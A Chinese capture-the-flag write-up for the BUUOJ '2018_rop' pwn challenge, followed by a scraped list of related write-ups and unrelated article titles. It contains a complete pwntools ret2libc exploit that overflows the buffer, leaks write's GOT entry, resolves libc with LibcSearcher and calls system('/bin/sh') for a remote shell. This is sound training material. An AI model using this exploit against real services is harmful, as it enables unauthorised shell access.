铁人三项(第五赛区)_2018_rop

checksec看到保护全关,进IDA分析就是很简单的一串逻辑,在第二个函数处看到了明显的溢出,但是题目里面没有直接提供shell相关操作,所以判断本题为ret2libc,题目中给到了write函数,所以考虑使用write函数来泄露

关于write参数fd我找到了如下解释

write() writes up to count bytes from the buffer starting at buf to the file referred to by the file descriptor fd.

概言之,就是0 stands for stdin and 1 stands for stdout,不一定正确,但是有助于记忆

from pwn import *
from LibcSearcher import *#context.log_level="debug"context(os='linux',arch='i386', log_level = 'debug')#p=process('./2018_rop')
elf=ELF('./2018_rop')
p=remote('node4.buuoj.cn', 26830)main_addr = 0x080484C6
write_plt = elf.plt['write']
write_got = elf.got['write']payload = b'a'*(0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload=b'a'*(0x88+0x4) + p32(system_addr) + p32(system_addr) + p32(binsh_addr)
p.sendline(payload)
p.interactive()

[BUUOJ]铁人三项(第五赛区)_2018_rop相关推荐

  1. [BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop

    [BUUCTF-pwn]--铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数 ...

  2. BUUCTF 刷题 铁人三项(第五赛区)_2018_rop

    BUUCTF在线评测 直接ret2libc,很简单,但是write函数有三个参数要填充 exp: from pwn import * from LibcSearcher import *context ...

  3. BUUCTF(pwn)铁人三项(第五赛区)_2018_rop

    最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') ...

  4. 【BUUCTFPWN】铁人三项(第五赛区)_2018_rop

    先用checksec检查一下,只开了NX,能用栈溢出. IDA反编译一下,里面也很简单,就调用了一个be_nice_to_people和vulnerable_function两个函数. 一次查看一下, ...

  5. BUUCTF 铁人三项(第五赛区)_2018_rop

    完全可以使用同一个脚本,只需要进行略微修改 比如修改IP 端口 以及查找Libc的模块 BUUCTF jarvisoj_level3_Red-Leaves的博客-CSDN博客

  6. “铁人三项”运营、技术、资本无短板,BW期货交易平台要逆天爆发?

    前段时间"交易即挖矿"的交易所大乱战,算是给币圈所有人都上了生动的一课:追热点的交易平台是如何快速"倒闭"的. 有网友统计,能数得上号的"倒闭&quo ...

  7. 信息安全 数据赛 铁人三项_信息安全铁人三项赛-赛事章程-信息安全铁人三项赛...

    赛事章程 竞赛总则 为贯彻<国务院关于大力推进大众创业万众创新若干政策措施的意见><国务院办公厅关于深化高等学校创新创业教育改革的实施意见>,落实中央网信办.国家发改委.教育部 ...

  8. 2018信息安全铁人三项第三赛区数据赛题解

    题目链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4 题目描述 1.黑客攻击的第一个受害主机的网卡IP地址 2.黑客对URL的哪 ...

  9. 信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解

    前言 由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录 题目分享: 链接: https://pan.baidu.com/s/1b6bkW- ...

最新文章

  1. Java反射(自己的理解)
  2. tp5查询字段相加_tp5 sum某个字段相加得到总数的例子
  3. python控制语句第一章_【原创】Python第一章
  4. (HDU)1491-- Octorber 21st (校庆)
  5. 在Chrome console里修改Vue界面元素,更新如何刷新回UI?
  6. Android开发之Dialog对话框(弹框)工具类
  7. 多线程下实现自增的几种方式
  8. 一个全球主要城市天气预报的WebService.
  9. 我如何开始学习Web开发
  10. 送你一份有态度的红包封面!
  11. python计算出nan_学习笔记0522:Tensorflow训练模型出现loss是nan的问题排查
  12. Hadoop的安装教程,很详细
  13. “那个人样子好怪。”“我也看到了,他好像一条狗。”
  14. 后场村的加班别有不同
  15. WinXP虚拟机安装softICE
  16. Windows查看ssh公钥方法
  17. Ubuntu修改只能用Guest登录
  18. Java 开发工具包
  19. MySQL常见数据类型(小胖虎带你了解MySQL基础知识,只为博君一关注)
  20. 如何写面向互联网公司的求职简历

热门文章

  1. HTML播放视频(兼容IE低版本)
  2. 火影忍者番外篇-Eova隐藏技能
  3. 怎么求编译原理中的first集,follow集和selec集
  4. Android:uniapp未配置appkey或配置错误
  5. EasyTouch手势识别
  6. fieldset标签的使用
  7. rqnoj 456 低价购买
  8. 这里是最全的15个设计风格总结!
  9. 使用python将PDF转word
  10. Matlab灰度图像反转,对数变换,幂次变换